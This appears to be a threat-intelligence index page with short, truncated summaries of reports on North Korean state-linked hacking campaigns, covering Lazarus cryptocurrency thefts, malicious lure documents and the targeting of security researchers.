211 reports
VP of Counter Adversary Operations, CrowdStrike CTO of Americas, CrowdStrike AI-Accelerated Threat Landscape: Year of the Evasive Adversary Virtual Threat Briefing CrowdStrike's experts reveal how threat actors are evading traditional defenses by weaponiz…
U.S. charges against three North Korean men covered a financially motivated Lazarus theft campaign that stole about $1.3 billion from banks and cryptocurrency exchanges, including the Bangladesh Bank heist. Symantec links the activity to Banswift malware …
ESTsecurity analyzed a Thallium-attributed malicious HWP document disguised as a COVID-19 small-business support guide. The document used embedded OLE objects and fake confirmation imagery to lure the user into launching apisecurity.vbs, which staged apis…
FBI, CISA, and Treasury assessed that North Korean state-sponsored Lazarus Group/HIDDEN COBRA actors used AppleJeus malware to target cryptocurrency exchanges, financial services firms, and related organizations for theft. The advisory says the operators …
The U.S. Justice Department indictment alleged that three North Korean RGB-linked programmers, associated in security reporting with Lazarus Group and APT38, conducted a long-running conspiracy spanning destructive attacks, financial theft, extortion, and…
presentation/GReATIDEA2021_Lazarus.pdf at main · theseongsu/presentation · GitHub You signed in with another tab or window. You must be signed in to change notification settings Files Expand file tree / GReATIDEA2021_Lazarus.pdf File metadata and controls…
Chainalysis attributed the 2020 KuCoin exchange hack, involving roughly $275 million in stolen cryptocurrency, to Lazarus Group based partly on laundering patterns previously associated with the North Korean actor. The report says the attackers gained acc…
ASEC observed malware distributed as a PIF executable disguised as a revised 2021 Ministry of National Defense work-report document. When run, the file displayed a legitimate PDF copied from the ministry website while silently dropping a malicious DLL at …
The report describes malicious Word documents themed around North Korean COVID-19 conditions that used VBA macros to drop a secondary payload and connect infected systems to attacker command-and-control infrastructure. The payload was identified as Amadey…
ThreatBook analyzed a Konni APT campaign using a North Korea COVID-19 supplies article as a lure document, consistent with the group’s long-running spear-phishing against South Korea and regional targets. The malicious Word document hid its text until mac…
Norfolk Infosec analyzed a malicious helpsvc.sys component from a DPRK-affiliated campaign targeting security researchers, likely delivered through a watering-hole route rather than the earlier Visual Studio social-engineering chain. The file behaves like…
NTT Security Japan reported changes in CryptoMimic activity, a financially motivated targeted attack group also known as Dangerous Password, CageyChameleon, Leery Turtle, or CryptoCore and described as having possible Lazarus links. The group continued ta…
This Korean analysis describes DPRK-linked malware activity targeting security researchers through fake vulnerability research collaboration and an actor-controlled blog at blog.br0vvnn[.]io. The attack chain used malicious exploit PoC projects whose buil…
The archived analysis reverse-engineers Torisma and LCPDot malware used in Lazarus/Hidden Cobra Operation Dream Job activity. Torisma is described as collecting host and process information, creating malicious pipes, loading DLLs, encrypting C2 communicat…
Microsoft attributed a campaign targeting security researchers to ZINC, a DPRK-affiliated state-sponsored group, after detecting attacks against penetration testers, private offensive researchers, and employees at security and technology companies. The op…